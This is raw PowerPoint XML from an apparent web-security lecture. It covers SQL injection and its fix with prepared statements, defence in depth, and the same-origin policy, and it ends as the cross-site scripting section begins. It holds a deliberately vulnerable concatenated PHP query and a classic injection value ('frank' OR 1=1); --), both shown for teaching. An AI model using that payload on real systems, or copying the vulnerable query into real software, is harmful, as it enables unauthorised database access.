            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="880110" lvl="1" indent="-440055" defTabSz="578358">
              <a:spcBef>
                <a:spcPts val="1400"/>
              </a:spcBef>
              <a:defRPr sz="3564"/>
            </a:pPr>
            <a:r>
              <a:t>Decouple the code and the data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="718" name="$db = new mysql(“localhost”, “user”, “pass”, “DB”);…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1874822" y="5332449"/>
            <a:ext cx="8742778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</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>db</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> = new </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1" smtClean="0"/>
              <a:t>mysql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smtClean="0"/>
              <a:t>localhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" smtClean="0"/>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" smtClean="0"/>
              <a:t>pass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" smtClean="0"/>
              <a:t>DB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" smtClean="0"/>
              <a:t>);</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/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/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$statement = $</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>db</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>prepare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smtClean="0"/>
              <a:t>select </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>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where(name=</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> and password</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" smtClean="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" smtClean="0"/>
              <a:t>);</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" smtClean="0"/>
              <a:t>);</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/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/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/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$statement-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1" smtClean="0"/>
              <a:t>bind_param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err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="1333FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="010000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>$user, $pass);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$statement-&gt;execute();</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="719" name="$result = mysql_query(“select * from Users…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1886793" y="3985883"/>
            <a:ext cx="8665332" cy="7620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$result = </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1" smtClean="0"/>
              <a:t>mysql_query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smtClean="0"/>
              <a:t>select </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>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where(name=‘$user’ and password=‘$pass</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" smtClean="0"/>
              <a:t>’);</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" smtClean="0"/>
              <a:t>);</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="720" name="Bind variables"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8627609" y="6274968"/>
            <a:ext cx="304065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Bind variables</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="721" name="Bind variables are typed"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5780666" y="7725645"/>
            <a:ext cx="508053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400" b="1">
                <a:solidFill>
                  <a:srgbClr val="13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Bind variables are typed</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29414330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" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="720" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="721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$statement =              “select * from Users…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2244738" y="2571886"/>
            <a:ext cx="7994664" cy="762001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$statement =              “select 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where(name=‘$user’ and password=‘$pass’);”;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="727" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="8188441" y="6449012"/>
            <a:ext cx="779875" cy="102087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28" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7111364" y="6641282"/>
            <a:ext cx="689424" cy="1009847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29" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6610529" y="5513925"/>
            <a:ext cx="1442983" cy="1017015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0" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="4994109" y="6641283"/>
            <a:ext cx="911066" cy="1009846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1" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4022887" y="6632029"/>
            <a:ext cx="1019100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2" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5018121" y="5517827"/>
            <a:ext cx="1120931" cy="950629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3" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="5402360" y="4325545"/>
            <a:ext cx="1019100" cy="101910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4" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4014588" y="4492603"/>
            <a:ext cx="252298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5" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2508754" y="4492603"/>
            <a:ext cx="1019100" cy="1019100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36" name="Using prepared state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Using prepared statements</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="737" name="$statement = $db-&gt;prepare(“select * from Users…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2195926" y="2271867"/>
            <a:ext cx="8515788" cy="10922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$statement = $</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>db</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>prepare</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" smtClean="0"/>
              <a:t>select </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>* from Users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2200">
                <a:solidFill>
                  <a:srgbClr val="01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		where(name=</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>and password</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" smtClean="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" smtClean="0"/>
              <a:t>);</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" smtClean="0"/>
              <a:t>);</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="220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$</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>stmt</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>bind_param</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>ss</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>", $user, $pass);</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="738" name="select / from / where"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2368919" y="4043178"/>
            <a:ext cx="3831003" cy="654350"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 29113"/>
            </a:avLst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select / from / where</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="739" name="*"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2330615" y="5075679"/>
            <a:ext cx="925868" cy="654350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*</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="740" name="Users"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3475411" y="5075679"/>
            <a:ext cx="1330653" cy="654350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Users</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="741" name="and"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5788493" y="5075679"/>
            <a:ext cx="1330653" cy="654350"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 29113"/>
            </a:avLst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and</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="742" name="="/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4667906" y="6108181"/>
            <a:ext cx="660825" cy="654349"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 29113"/>
            </a:avLst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=</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="743" name="name"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3717985" y="7140681"/>
            <a:ext cx="1132871" cy="654350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name</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="744" name="?"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5154934" y="7140681"/>
            <a:ext cx="1239541" cy="654350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2700"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745" name="="/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7696466" y="6108181"/>
            <a:ext cx="660824" cy="654349"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 29113"/>
            </a:avLst>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId2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=</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="746" name="password"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6656598" y="7128464"/>
            <a:ext cx="1598956" cy="654349"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 29113"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solid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password</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="747" name="?"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8326589" y="7128464"/>
            <a:ext cx="1239541" cy="654349"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 29113"/>
            </a:avLst>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId3"/>
          </a:blipFill>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="12700" dist="127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r>
              <a:t>?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="748" name="Binding is only applied to the leaves, so the structure of the tree is fixed"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2440388" y="8492990"/>
            <a:ext cx="813523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Binding is only applied to the leaves, so the structure of the tree is </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1"/>
              <a:t>fixed</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="751" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5154934" y="7128464"/>
            <a:ext cx="4411197" cy="666567"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="4411195" cy="666566"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="749" name="$user"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="12218"/>
              <a:ext cx="1239540" cy="654349"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 2911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$user</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="750" name="$pass"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3171656" y="0"/>
              <a:ext cx="1239540" cy="654349"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 29113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$pass</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="752" name="frank’…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5035252" y="7119759"/>
            <a:ext cx="1486124" cy="1016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2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent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frank’ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent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OR 1=1);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent5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-- </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="325336994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" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="748" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="751" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="752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Additional mitig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Additional mitigation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="755" name="For defense in depth, also try to mitigate any attac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420"/>
            </a:pPr>
            <a:r>
              <a:t>For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defense in depth</a:t>
            </a:r>
            <a:r>
              <a:t>,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also</a:t>
            </a:r>
            <a:r>
              <a:t> try to mitigate any attack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But should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always do input validation</a:t>
            </a:r>
            <a:r>
              <a:t> in any case!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Limit privileges</a:t>
            </a:r>
            <a:r>
              <a:t>; reduces power of exploitation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Limit commands and/or tables a user can access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e.g., allow SELECT on Orders but not Creditcards</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="422275" indent="-422275" defTabSz="554990">
              <a:spcBef>
                <a:spcPts val="3900"/>
              </a:spcBef>
              <a:defRPr sz="3420"/>
            </a:pP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Encrypt sensitive data</a:t>
            </a:r>
            <a:r>
              <a:t>; less useful if stolen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May not need to encrypt Orders table</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="844550" lvl="1" indent="-422275" defTabSz="554990">
              <a:spcBef>
                <a:spcPts val="1400"/>
              </a:spcBef>
              <a:defRPr sz="3420"/>
            </a:pPr>
            <a:r>
              <a:t>But certainly encrypt </a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>creditcards.cc</a:t>
            </a:r>
            <a:r>
              <a:t>_numbers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4916892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0" build="p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Input validation, ad infinit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r>
              <a:t>Input validation, ad infinitum</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="955" name="Many other web-based bugs, ultimately due to trusting external input (too much)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226821" cy="5588000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:t>Many other web-based bugs, ultimately due to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trusting external input</a:t>
            </a:r>
            <a:r>
              <a:t> (too much)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9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3866" y="2646591"/>
            <a:ext cx="5529734" cy="6082708"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="957" name="http://www.jantoo.com/cartoon/08336711"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7761388" y="9253271"/>
            <a:ext cx="3834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http://www.jantoo.com/cartoon/08336711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" grpId="1" build="p" bldLvl="5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Takeaways: Verify before tru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Takeaways: Verify before trust</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="964" name="Improperly validated input causes many attacks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5690524"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:t>Improperly validated input causes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many</a:t>
            </a:r>
            <a:r>
              <a:t> attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:t>Common to solutions: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"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check</a:t>
            </a:r>
            <a:r>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"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sanitize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all data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Whitelisting</a:t>
            </a:r>
            <a:r>
              <a:t>: More secure than blacklisting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Checking</a:t>
            </a:r>
            <a:r>
              <a:t>: More secure than sanitization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:t>Proper sanitization is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hard</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr b="1">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>All data</a:t>
            </a:r>
            <a:r>
              <a:t>: Are you sure you found all inputs?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>Don’t roll your own: libraries, frameworks,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What could go wro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could go wrong?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="773" name="Browsers need to confine Javascript’s pow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Browsers need to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confine </a:t>
            </a:r>
            <a:r>
              <a:t>Javascript’s power</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:t>A script on </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>attacker.com</a:t>
            </a:r>
            <a:r>
              <a:t> should not be able to:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>Alter the layout of a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page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>Read user keystrokes from a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page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>Read cookies belonging to </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>bank.com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ame Origin Poli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Same Origin Policy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="776" name="Browsers provide isolation for javascript via SOP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4100"/>
              </a:spcBef>
              <a:defRPr sz="3528"/>
            </a:pPr>
            <a:r>
              <a:t>Browsers provide isolation for javascript via </a:t>
            </a:r>
            <a:r>
              <a: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SOP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Browser associates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web page elements</a:t>
            </a:r>
            <a:r>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="871219" lvl="1" indent="-435609" defTabSz="572516">
              <a:spcBef>
                <a:spcPts val="1400"/>
              </a:spcBef>
              <a:defRPr sz="3528"/>
            </a:pPr>
            <a:r>
              <a:t>Layout, cookies, events</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="435609" indent="-435609" defTabSz="572516">
              <a:spcBef>
                <a:spcPts val="4100"/>
              </a:spcBef>
              <a:defRPr sz="3528"/>
            </a:pPr>
            <a:r>
              <a:t>…with their </a:t>
            </a:r>
            <a:r>
              <a:rPr b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rPr>
              <a:t>origin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="871219" lvl="1" indent="-435609" defTabSz="572516">
              <a:spcBef>
                <a:spcPts val="1400"/>
              </a:spcBef>
              <a:defRPr sz="3528"/>
            </a:pPr>
            <a:r>
              <a:t>Hostname (</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>bank.com</a:t>
            </a:r>
            <a:r>
              <a:t>) that provided them</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="572516">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="3528">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr" defTabSz="572516">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="3528">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:defRPr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SOP</a:t>
            </a:r>
            <a:r>
              <a:t> =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only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scripts received from a web page’s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origin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indent="0" algn="ctr" defTabSz="572516">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="3528">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr i="1">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>have access to the page’s elements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Cross-site scripting (XSS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Cross-site scripting (XSS)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Two types of X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types of XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
